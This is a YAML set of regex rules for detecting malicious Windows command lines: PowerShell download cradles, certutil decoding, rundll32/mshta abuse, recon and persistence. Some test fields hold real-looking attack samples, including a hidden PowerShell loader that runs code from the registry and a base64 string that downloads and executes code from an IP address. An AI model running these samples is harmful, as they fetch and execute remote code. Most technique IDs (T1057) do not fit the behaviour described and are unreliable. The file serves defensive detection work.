# References
# https://github.com/chenerlich/FCL

keys:
  1:
    command: '.*certutil.exe (.*-decode.*)'
    name: certutil -decode was used, potentially to deobfuscate malware.
    description: Attackers often certutil -decode to retrieve second-stage payloads.
    tactic: Execution
    technique: T1057
    risk: Medium
  2:
    command: '^(?=.*\bbypass\b)(?=.*\bNet\.WebClient\b)(?=.*\bDownloadFile\b)(?=.*\biex\b).*$'
    name: PowerShell was used to download a file.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  3:
    command: '^(?=.*\bNonInteractive\b)(?=.*\bbypass\b)(?=.*\bASCII\.GetString\b)(?=.*\bHKCU\b).*$'
    name: PowerShell was used to convert a string from memory.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
    test: 'powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp ''HKCU:\Software\Classes\test'').test)));'
  4:
    command: '^(?=.*\bWMIobject\b)(?=.*\bSCM\b)(?=.*\bIEX\b)(?=.*\bDownloadString\b).*$'
    name: PowerShell was used with WMI/SCM to download data.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  5:
    command: '^(?=.*\bRuntIME\.InteroPsERvICEs\.marshAl\b)(?=.*\bGeTMEmbERS()\b)(?=.*\bSeCureSTrINg\b)(?=.*\bTOStrIng\b)(?=.*\bjoIn\b).*$'
    name: A commandline resembling Emotet was detected.
    description: Attackers often abuse PowerShell features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  6:
    command: '^(?=.*\bjavascript:\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b)(?=.*\beval\b).*$'
    name: A commandline resembling WScript/MSHTA abuse was detected.
    description: Attackers often abuse WScript features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  7:
    command: '^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bGetObject\b)(?=.*\bscript:http\b).*$'
    name: A commandline resembling rundll32 abuse was detected.
    description: Attackers often abuse rundll32 features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  8:
    command: '^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b).*$'
    name: A commandline resembling rundll32 abuse was detected.
    description: Attackers often abuse rundll32 features for malicious actions.
    tactic: Execution
    technique: T1057
    risk: Medium
  9:
    command: '(''|")[0,1](?:[A-Za-z=0-9+/]){200,}(''|")[0,1]'
    name: Commandline containing very long Base64 String
    description: Attackers often abuse Base64 encoding to avoid static detections.
    tactic: Defense Evasion
    technique: T1140
    risk: Medium
    test: "powershell decode from base64 IiRoamY9TmV3LU9ia/mVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskaG+pmLlByb3h5PVtTeXN0ZW0uTl5ldC5XZWJSZXF1ZXN0XTo6R2V0U3lzdGVtV2ViUHJveHkoKTskaGpmLlByb3h5LkNyZWRlbnRpYWxzPVtTeXN0ZW0uTl5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JGhqZi5IZWFkZXJzLkFkZCgnVXNlci1BZ2VudCcsJ00vNS4xOCcpOyRyPSRoamYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTMuMTA5LjY5LjUvZ2dnbS91cGwvdHh0Jyk7SUVYICRyIg=="
  10:
    command: 'w[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}s[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}c[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}r[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}i[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}p[%@!?;:\[\]\{\}=+-_$#\^&*()`~<>]{0,15}t'
    name: Commandline containing obfuscated wscript
    description: Attackers often abuse cmd-line obfuscation/encoding to avoid static detections.
    tactic: Defense Evasion
    technique: T1140
    risk: High
    test: 'C:\afoabngf\aogfbn\cmd.exe /c set x=w@sc@r@i@pt /e:j@sc@rip@t .. echo %x:@=%|cmd'
  11:
    command: '.*net.*localgroup.*administrators.*'
    name: Local Administrators were queries.
    description: Attackers often recon local admins for privilege escalation checks.
    tactic: Reconnaissance
    technique: T1057
    risk: Medium
  12:
    command: '.*wmic qfe.*'
    name: Patch Level was Queried.
    description: Attackers often recon the OS Patch Level.
    tactic: Reconnaissance
    technique: T1057
    risk: Low
  13:
    command: '.*dsquery group "ou=Domain Admins,dc=.*,dc=.*".*'
    name: DSQUERY tool was used to check for Domain Admins.
    description: Attackers often abuse dsquery for Domain-Level recon.
    tactic: Reconnaissance
    technique: T1057
    risk: Low
  14:
    command: '.*net (localgroup|user|group "domain admins").*'
    name: net was used to perform a suspicious query.
    description: Attackers often query domain and local items with net as an initial step.
    tactic: Reconnaissance
    technique: T1057
    risk: Low
  15:
    command: '.*reg.*(add|query).*(SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce|RunServices)|\\mscfile\\shell\\open\\command|Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\.*\\shell\\runas\\command\\isolatedCommand).*'
    name: reg was used to perform a suspicious query or add.
    description: Attackers often utilize reg for execution and privilege escalation.
    tactic: Execution
    technique: T1057
    risk: Medium
  16:
    command: '.*(Start-Process|cmd.exe|cmd).*eventvwr.msc.*'
    name: Event Viewer was opened.
    description: Attackers often utilize built-in Event Viewer for understanding blue-team visibility.
    tactic: Execution
    technique: T1057
    risk: Medium
  17:
    command: '.*cmstp.*/s.*\.inf.*'
    name: Potential CMSTP abuse.
    description: Attackers often abuse cmstp for execution and privilege escalation techniques.
    tactic: Execution
    technique: T1057
    risk: Medium
  18:
    command: '.*(csc|csc\.exe) .*/out:.*\.exe.*'
    name: Potential CSC abuse.
    description: Attackers often abuse csc for local code compilation of malicious binaries.
    tactic: Execution
    technique: T1057
    risk: Medium
  19:
    command: '.*(hh|hh\.exe) .*\.chm.*'
    name: Potential HH abuse.
    description: Attackers often abuse HH with .CHM files for execution.
    tactic: Execution
    technique: T1057
    risk: Medium
  20:
    command: '.*(export .*_proxy=.*|netsh interface portproxy add).*'
    name: Potential Proxy Setting\Abuse.
    description: Attackers may attempt to alter system proxy settings..
    tactic: Execution
    technique: T1057
    risk: Medium
